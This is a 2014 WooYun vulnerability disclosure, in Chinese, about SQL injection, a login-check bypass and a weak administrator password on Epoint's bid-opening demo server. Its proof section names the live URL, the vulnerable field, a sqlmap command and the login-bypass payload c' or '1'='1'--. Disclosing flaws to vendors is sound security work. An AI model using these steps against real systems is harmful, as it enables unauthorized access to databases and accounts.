漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2014-082380
漏洞标题:新点网上开评标演示系统SQL注入+白锁绕过+管理员弱口令
相关厂商:epoint.com.cn
漏洞作者: 10457793
提交时间:2014-11-07 17:21
修复时间:2014-11-12 17:22
公开时间:2014-11-12 17:22
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:20
漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2014-11-07: 细节已通知厂商并且等待厂商处理中
2014-11-12: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
问题是为什么老的问题依旧存在,借此漏洞希望贵公司修复
漏洞http://www.wooyun.org/bugs/wooyun-2013-040073
和
漏洞http://www.wooyun.org/bugs/wooyun-2013-040017
所涉及的问题!
详细说明:
是官方演示服务器
地址http://ztb.epoint.com.cn:8090/bzbpb5_demo/login.aspx
问题1:sql注入,可获取多个产品数据库信息,多款演示产品共用一个数据库
问题2:白锁绕过
问题3:管理员弱口令
漏洞证明:
测试使用浏览器为火狐
问题1证明:
打开
http://ztb.epoint.com.cn:8090/bzbpb5_demo/login.aspx
点击开标管理员登录,burpsuite代理,修改POST数据中txtWhiteKey='即可触发报错。
sqlmap参数:sqlmap -r /root/ztb -p"txtWhiteKey" --dbms=mssql --level=5
可以获取的数据库列表
数据库版本
问题2和3证明:
点击开标管理员登录
输入
点击登录,无视任何报错都点击确定
burpsuite抓包
修改txtWhiteKey=c' or '1'='1'--
返回302跳转
登录成功
修复方案:
版权声明:转载请注明来源 10457793@乌云
漏洞回应
厂商回应:
危害等级:无影响厂商忽略
忽略时间:2014-11-12 17:22
厂商回复:
最新状态:
2015-04-03:已修复此漏洞